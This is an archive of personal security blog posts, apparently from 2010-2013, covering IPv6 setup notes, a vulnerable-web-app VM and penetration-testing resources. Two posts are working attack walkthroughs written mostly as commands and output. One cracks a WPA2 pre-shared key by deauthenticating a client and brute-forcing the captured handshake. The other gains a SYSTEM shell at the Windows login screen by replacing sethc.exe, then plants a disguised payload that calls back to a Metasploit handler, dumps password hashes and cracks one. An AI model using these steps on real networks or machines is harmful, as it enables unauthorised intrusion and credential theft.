owaspbwa – web testing fast-track

20 09 2013

WOW – has it really been since January !!!??? – time flies when you are having fun.

Just wanted to share a nice little project I came across when looking for vulnerable web apps etc.

Many many thanks to Mandiant for sponsoring the bundling of so many of these into the one VM. Means you dont have to spend the day setting up each one before you can start playing with them.



All the favorites are there, as well as plenty I hadn’t seen before.


Applications designed for learning which guide the user to specific, intentional vulnerabilities.


One tip though, if you download the 1.1 VM, make sure you replace the tomcat init script as identified in this BR: https://code.google.com/p/owaspbwa/issues/detail?id=83 otherwise anything that relies on tomcat (WebGoat etc) wont work & instead just give you the following warning:

503 - Service Temporarily Unavailable

IPv6 Adventures – Part 1

31 01 2012

So – I decided it was finally time to finish implementing & document my IPv6 config – mainly so I remember how I did it, but also to help others on their IPv6 journey to the interwebs

High Level:

– Get a IPv6 subnet (duh) – This will depend on your scenario, several ISP’s offer native IPv6 (Internode) – mine does not (Telstra Bigpond).
– Configure a router / firewall / host with IPv6 address from your subnet
– Configure an IPv6 DNS address on that device to resolve AAAA records
– Bask in the IPv6ness of the interwebs – it looks eerily like the IPv4ness of the interwebs.

My Journey:

– I was already running the awesome Astaro for my border FW & home – which has great IPv6 support built in.
– I signed up for a subnet with Freenet6 / gogonet – http://gogonet.gogo6.com/page/freenet6-ipv6-services


Ok, before we move on with turning the IPv6 up – you need to plan out a couple of things.

– Your IPv6 address is PUBLIC – it is reachable from the outside world, consider the consequences & firewall appropriately, also turn off NAT for IPv6 if your FW supports it – it will be a PITA when testing with your web browser & getting a different IPv6 address than you expect.

– IPv6 Subnetting – depending on the provider, you will be allocated something like a /56 subnet (4722366482869645213696 host IP’s — SERIOUSLY)

I broke my /56 up into /64 subnets for each zone (INSIDE / DMZ1 / DMZ2 / DARKNET) – still giving me 256 subnets containing 18446744073709551616 host addresses each …. I dont think im going to run out of addresses any time soon.

I could have broken em up into /96 subnets, giving me 1099511627776 subnets with 4294967296 (4 billion) hosts in each …. but really, when we are talking numbers like this, its just academic – use whatever fits your network design. I figured that im not going to ever need 256 subnets or more, so I just broke it up there, and /64 is a nice subnet mask boundry.

So what does this actually look like ?

2406:A000:F006:A400::/56 – My allocated IPv6 subnet from my tunnel broker

You can get some good info about your subnet using tools like http://www.gestioip.net/cgi-bin/subnet_calculator.cgi

IP address: 2406:a000:f006:a400:0000:0000:0000:0000
type: GLOBAL-UNICASTnetwork2406:a000:f006:a400::
Prefix length: 56
Prefix address: ffff:ffff:ffff:ff00:0000:0000:0000:0000
address range start: 2406:a000:f006:a400:0000:0000:0000:0000
address range end: 2406:a000:f006:a4ff:ffff:ffff:ffff:ffff
total IP addresses: 4722366482869645213696

As I mentioned above, I carved out 4x /64 subnets from this.

You can do in offline, but I cheated & used this IPv6 subnet calc – http://www.subnetonline.com/pages/subnet-calculators/ipv6-subnet-calculator.php

Here we go – nice & neat /64 subnets – im using 4 from the possible 256.


ffff:ffff:ffff:ffff:0000:0000:0000:0000 – /64 Mask

Now that we have our subnets planned out, we can continue on to implementation

Next Time ….

WPA2 network cracking

27 09 2011

So – everyone has cracked WEP & everyone knows it has a couple of seconds security around it.

This time I am getting connected to a WPA2 / PSK protected network.

Couple of things you will need

  • Backtrack (I am using 5r1 )
  • A wordlist – google is your friend here but there is a 3169 word list at /pentest/passwords/john/password.lst to get you started
  • A wireless card
  • A WPA or WPA2 network protected with a pre-shared key (your own of course)

==Drop the interface into monitor mode==

root@bt:~# airmon-ng start wlan0

Interface    Chipset        Driver

wlan0        Zydas zd1211    zd1211rw - [phy1]
(monitor mode enabled on mon0)

==Find your target wireless network==

root@bt:~# airodump-ng mon0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 38:E7:D8:AD:B2:0E    0       61        0    0  11  54e  WPA2 CCMP   PSK  Wireless

==Start capturing==

root@bt:~# airodump-ng mon0 --channel 11 --bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

 CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                           

 38:E7:D8:AD:B2:0E    0 100     4319       83    0  11  54e  WPA2 CCMP   PSK  Wireless                        

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                    

 38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0    1 -48      0       81  Wireless

So now that you are capturing the traffic, we can either wait for a user to connect, or deauth an existing one….

==Deauth an existing user to get the 4 way handshake==

root@bt:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49  Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50  Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]

Once the user is connected, you see the WPA handshake in the top right corner

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E    0  96      807       28    0  11  54e  WPA2 CCMP   PSK  Wireless

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0   54 - 6      0      161

Now, the best bit of this over WEP cracking is that we no longer need to be anywhere near the network. The cracking is done offline.

==The easy way (No garuntee this will work)==

There are two ways to tackle this – at the end of the day, you need to brute force the password, but having a decent wordlist gives you a huge advantage over a,b,c,d 1,2,3,4 etc.

This is the secret sauce – without a decent wordlist, you got nothing.

For this example we will just use the one that comes with JTR in BT

root@bt:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:00] 48 keys tested (489.60 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 

BOOHYA – our WPA2 PSK is sunshine

==The hard way (but will EVENTUALLY find it)==

root@bt:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:22] 11484 keys tested (534.50 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 

So thats it … no smoke … no mirrors … Get the capture of a handshake, then brute force the key from it 😀

Remember this the next time you are thinking of a PSK for your wireless router.

A good page to read about password strength & get a feel for what it takes to brute force different passwords is the Password Haystacks page by Steve Gibson (grc.com)

Disable Windows 7 IPv6 random temporary addresses

4 08 2011

One of the added security features with IPv6 addressing is “Temporary address interface identifiers”


Many operating systems use the EUI-64 algorithm to generate IPv6 addresses. This algorithm derives the last 64 bits of the IPv6 address using the MAC address. Many see this as a privacy problem. The last half of your IP address will never change, and with MAC addresses being somewhat unique, the interface ID becomes close to a unique “cookie” identifying your system.

As a result, RFC3041 introduces “privacy enhanced” addresses which will change and are created by hashing the MAC address.

*NOTE: Default behaviour of Windows XP & Server 2003 does not use the randomization*

What this means from an administration perspective is that after every reboot, the IPv6 address that is presented to the network changes ….. which makes things like DNS / FW rules etc a nightmare to manage in a corporate / enterprise scenario where you really need to be able to have a stable addressing scheme.

I have a /52 IPv6 subnet through a tunnel broker. My border firewall terminates the tunnel & advertises the subnet on the inside interface for autoconfiguration (without having to configure DHCP)

So, lets break it down.

I get a /52 subnet, which is advertised to my internal machines.


In normal configuration, by default in Windows 7 – it generates a randomized Link-local address (not based on the MAC)

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
Link-local IPv6 Address . . . . . : fe80::d95:67db:fba2:7dad%11(Preferred)

Using stateless autoconfiguration I get an IPv6 address from my FW, based on the Link-local address

IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:d95:67db:fba2:7dad(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

However, Windows isnt done yet, it also assigns a Temporary IPv6 address – which is used when accessing network resources. This Temporary address is only kept for a set period, and changes when the machine reboots – and here is the problem. How can I configure a firewall rule for this host to reach an external resource ?

Here is the result of several reboots:

Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a5cb:b012:16f0:6fa9
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:ec65:b6ca:abd6:1349
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:752b:87c:f84:a4d6
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:1031:46fd:cfd7:d88c
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:5883:7ef2:9c64:6eab
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a400:251a:59:1cd6:bf0f

You can disable this & just use the interface based EUI-64 address by running the following commands.

Bring up a command prompt in administrator mode (Start -> All Programs -> Accessories -> Right click on Command Prompt, run as Administrator)

Then run these commands (should get OK response)

netsh interface ipv6 set privacy state=disabled store=active
netsh interface ipv6 set privacy state=disabled store=persistent
netsh interface ipv6 set global randomizeidentifiers=disabled store=active
netsh interface ipv6 set global randomizeidentifiers=disabled store=persistent

Restart your machine

Your machine should now get a stable IPv6 address based on the MAC address. You can now use this MAC address for DNS entries, FW rules etc & it’s access will remain consistent across reboots.

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:20c:29ff:fe88:9f2a(Preferred)
Link-local IPv6 Address . . . . . : fe80::20c:29ff:fe88:9f2a%10(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

A note on the addressing – In this addressing mode, the 64-bit interface identifier is derived from its 48-bit MAC address. A MAC address 00:1D:BA:06:37:64 is turned into a 64-bit EUI-64 by inserting FF:FE in the middle: 00:1D:BA:FF:FE:06:37:64. As I “only” have a /52 assigned to me the whole MAC is not used, but the address is based on the last 5 octets.

60seconds of physical access = p0wn3d windows machine

27 09 2010

So I came across some interesting articles about getting a shell with system priv on a windows box that you have physical access to …… sounds fun 😀

There are two ways to get this access using existing windows services, both involve replacing a helper service file with cmd.exe (or other exe, but we are just getting shell for now) and invoking the “helper” via key presses at the login screen.

Shift Key x5 – “Stickey keys helper”

Most windows machines (Up to & Including Server 2008 / Windows 7 etc) will invoke the StickyKeys helper app when you hit shift 5 times, even at the login prompt.

reboot your target with your favourite bootable image (backtrack is my choice, but you can use pretty much anything). Once you are in the distro of choice, you need to mount the target drive, backup the original file and copy in cmd.exe

Mount the drive (assuming its NTFS) and do the file copying

root@bt:~# mkdir disk
root@bt:~# ntfs-3g /dev/sda1 ./disk
root@bt:~# cd disk
root@bt:~/disk# cd WINDOWS/system32
root@bt:~/disk/WINDOWS/system32# mv sethc.exe sethc.exe.old
root@bt:~/disk/WINDOWS/system32# cp cmd.exe sethc.exe
root@bt:~/disk/WINDOWS/system32# cd
root@bt:~# umount ./disk
root@bt:~# reboot

Of course, while you are at it, you may want to drop your favourite “network tools application” somewhere onto the target drive, so you have something fun to run in a minute, you “could” also setup a machine on the same segment as the target, with a handler ….. but what you do there is up to you.

This time when you are at your windows login screen, hit Shift 5 time and bingo – shell, with system priv

Now comes the fun part … with your networktool.exe you dropped earlier….

Ooooh calculator …. wonder what that does ….

……. somewhere on another part of the network …… not so far far away ……

msf exploit(handler) >
[*] Request received for /Arf3V...
[*] Staging connection for target rf3V received...
[*] Patching Target ID rf3V into DLL
[*] Request received for /Brf3V...
[*] Stage connection for target rf3V received...
[*] Meterpreter session 2 opened ( -> at 2010-09-27 21:35:10
[*] Session ID 2 ( -> processing InitialAutoRunScript '/migrate.rb'
[*] Current server process: networktool.exe (996)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 684
[*] New server process: lsass.exe (684)

msf exploit(handler) > sessions -l

Active sessions

Id  Type                   Information
--  ----                   -----------
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ N00B-DB56488                                                   .137:1030

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  :
Netmask     :

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:5c:38:31
IP Address  :
Netmask     :

meterpreter > sysinfo
Computer: N00B-DB56488C96
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
meterpreter >

Go Here: http://lmcrack.com/index.php

Enter captured hash: 921988ba001dc8e14a3b108f3fa6cb6d

Get Result: 921988BA001DC8E14A3B108F3FA6CB6D = P@ssw0rd

Login …… p0wn3d

Another way to achieve the same goal is with Utilman.exe & then using WindowsKey + U instead of Shift x5. Depending on the security settings locked down on the domain (GPOs) these may or may not work for you – only one way to find out.

PaulDotCom: Archives : Zen and The Art Of An Internal Penetration Testing Program

5 09 2010

Ok Ok …. I know im 2 years late to post this as a “new” presentation – but there is some interesting & valuable info in here about pentesting your internal network. Its starts out pretty high level, but is a nice rounded overview on the reasons, methods & tools that you can use to penetration test your network. Hosted by CoreSecurity & presented by Paul Asadoorian from pauldotcom.


• Phase I – Target identification
• Phase II – Detect OS & Services
• Phase III – Identify Vulnerabilities


• Phase IV – Exploitation
• Phase V – Post-Exploitation
• Phase VI – Reporting

Part 1 has some great grounding information in penetration testing, examples in here for several tools (nmap, nessus, nbtscan etc) and also ways to link them together, eg, run an nmap scan across the network, identifying windows hosts listening on 445, use the nmap scripting engine to determine if they are vulnerable – and use that list of hosts in nessus or metasploit etc.

Part 2 contains more information on why should you exploit a machine, how to exploit etc, using both Metasploit & Core Impact. Some useful info on tasks to perform once you have compromised a host – automated info gathering, looking for sensitive data, gathering screenshots, video, sound recordings etc etc. This segment ends with some good tips on how to report this information to management, then some Q&A.

there is some great info in here, its worth a look.

Part 1:

This webcast is Part I of a two part series I am doing in collaboration with Core Security Technologies. The presentation is full of tips, tricks, process, and practical knowledge about performing penetration testing within your own organization. Whether you are a third-party doing penetration tests or want to penetration test your internal network, this webcast is for you! In Part I I cover such topics as finding rogue access points, processes for creating a successful penetration testing program, identifying targets, and more! Information and resources are below:

via PaulDotCom: Archives.


Zen and the Art of an Internal Penetration Testing Program Part I with Paul Asadoorian
Recording date: Wednesday, November 19, 2008 3:00 pm Eastern Standard Time (New York, GMT-05:00)
Panelist Information: Paul Asadoorian of PaulDotCom Security Weekly
Duration: 1 hour 9 minutes

Please join Core Security and Paul Asadoorian, founder of PaulDotCom Security Weekly, for a live webcast: “Zen and the Art of Maintaining an Internal Penetration Testing Program.”

During this webcast, Asadoorian will offer tips on successfully integrating penetration testing into your vulnerability management program. You’ll learn:

* How to determine if internal penetration testing is right for your organization
* What questions you should ask when planning a pen testing initiative
* How you can best pitch testing to other departments and gain permission from management
* What types of tests to run and how to address the process of dealing with compromised devices
* Which tips and tricks can help you carry out faster, more effective testing

Whether you’re considering rolling out an internal penetration testing program or need a refresher of best practices for your current testing initiatives, this webcast is sure to be time well-spent.

via Core Security: Recorded webcast

Part 2:

During the webcast, Paul Asadoorian of PaulDotCom Security Weekly will discuss best practices for automating your security testing initiatives. You’ll learn tips and tricks for tying vulnerability scanning, penetration testing and reporting into an efficient, repeatable testing process. Paul will demonstrate techniques for vulnerability identification and exploitation, including:

• Importing Nmap data into Nessus
• Using Nessus, and running nessuscmd to automate vulnerability scanning
• Importing results into Metasploit
• Running msfcli to automate penetration testing
• Importing Nmap & Nessus results into CORE IMPACT Pro
• Using Python to script tasks on compromised hosts with CORE IMPACT Pro

You’ll also get answers to questions such as, “How do I integrate password cracking into my testing?” and “What should I do once a host is compromised during a test?”

via Core Security: Recorded webcast

The Ethical Hacker Network – Maltego 3: First Look

5 09 2010

Recently read a great review on Maltego – its a quick walk through on digging the internet for information on an individual, from just a name, to email addresses, photos to physical location & phone numbers – its worth a read, and worth a download & play with the free version.

What is Maltego?

Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format.

Maltego, developed by Roelof Temmingh, Andrew Macpherson and their team over at Paterva, is a premier information gathering tool that allows you to visualize and understand common trust relationships between entities of your choosing. Currently Maltego 3 is available for Windows and Linux. There is also an upcoming version for Apple users that has yet to be released.

Information gathering is a vital part of any penetration test or security audit, and it’s a process that demands patience, concentration and the right tool to be done correctly. In our case Maltego 3 is the tool for the job.

In this article we explore Maltego 3 and examine its fundamental features and a little hands-on with the newly designed version. If you haven’t already had a chance to upgrade to or pick up Maltego 3 you are missing out.

via The Ethical Hacker Network – Maltego 3: First Look.